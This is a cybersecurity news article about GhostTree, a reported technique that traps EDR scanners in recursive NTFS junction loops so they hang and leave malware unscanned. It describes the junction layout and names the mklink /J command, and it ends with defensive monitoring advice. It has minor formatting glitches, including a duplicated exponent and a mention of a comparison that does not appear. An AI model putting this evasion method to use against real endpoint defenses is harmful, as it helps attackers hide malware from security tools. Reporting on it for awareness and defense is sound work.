New GhostTree Attack Causing EDR Products to Hang and Leave Files

A novel evasion technique called GhostTree exploits NTFS junctions to create recursive directory loops.

Uncovered by Varonis Threat Labs, this method traps Endpoint Detection and Response (EDR) scanners in infinite paths, causing them to hang and ignore malicious payloads.

NTFS junctions function as advanced shortcuts that redirect applications from one directory to another seamlessly.

Threat actors favor this feature because creating a junction requires only standard write permissions rather than administrative privileges.

Attackers simply execute the mklink /J command in the Windows terminal to link a new path to a target directory.

GhostTree Attack on EDR

While the NTFS file system natively supports extended paths, legacy software heavily restricts practical path depth across the operating system.

Classic Windows architectures enforce a strict maximum path length of 260 characters, which ultimately caps how deep recursive directory loops can extend.

The foundational GhostBranch attack involves an adversary creating a junction that points a child directory directly back to its parent.

This misconfiguration builds a logical loop where the child folder endlessly replicates the parent’s contents, including itself. Attackers using single-letter folder names can nest directories to a maximum depth of approximately 126 levels.

GhostTree exponentially amplifies this threat by linking multiple child directories back to the same parent folder.

This dual-node configuration generates approximately $2^{126}$2126 distinct file paths, presenting an astronomical number of routes to a single executable. The resulting directory structure resembles a complex binary tree that branches recursively until hitting operating system limits.

EDR Scanning Failures

When security products attempt to recursively scan these manipulated directories, they continuously traverse the infinitely generating paths.

The scanning engine becomes entirely consumed by the directory loop and ultimately hangs without completing its task. Any actual malware placed alongside the junction remains unscanned and completely undetected by the endpoint agent.

The operational elements of these evasion techniques highlight their simplicity and severe impact on file system analysis. Defenders can use the comparison below to understand the exponential scaling differences between the two attack variants.

Varonis researchers successfully validated this evasion technique by testing it directly against Windows Defender.

Microsoft initially closed the bug report without action, stating that bypassing an antivirus engine does not qualify as crossing a defined security boundary.

Despite this initial stance, Microsoft eventually deployed a patch to resolve the underlying recursive scanning vulnerability.

Because native endpoint scanners can be subverted by logical file loops, organizations must implement defense-in-depth strategies.

Security operations centers should monitor file access events at the data layer to identify the anomalous creation of junctions.

Detecting recursive directory structures that deviate from normal operational patterns is critical for identifying GhostTree activity before execution.

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.